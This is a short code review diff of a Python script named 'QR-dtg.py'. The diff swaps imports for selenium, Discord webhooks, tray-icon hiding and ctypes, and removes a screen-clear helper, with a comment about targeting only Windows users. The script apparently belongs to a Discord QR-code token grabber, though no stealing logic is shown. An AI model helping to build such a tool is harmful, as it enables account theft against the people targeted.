QR-dtg.py

```diff
@@ -1,21 +1,17 @@
-import base64, os, platform, re, time, sys
+import base64, os, re, time, sys
 from requests import get
 from bs4 import BeautifulSoup
 from colorama import Fore, init
 from PIL import Image
 from selenium import webdriver
-from warnings import filterwarnings
+from selenium.webdriver.chrome.service import Service
 from discord_webhook import DiscordEmbed, DiscordWebhook
+from utilities import pystray_img
+from pystray import Menu, MenuItem, Icon
+from io import BytesIO
+import ctypes
+from threading import Thread
 
-def clear() -> None:
-    #Clear the screen; works with "cls" and "clear" commands.
-    if platform.system() == "Windows":
-        os.system("cls")
-    elif platform.system() == "Darwin" or platform.system() == "Linux":
-        os.system("clear")
-    else:
-        pass
-        
```

Comment:
No need to use this because we are skopping only windows user don't forget we use chromedriver.exe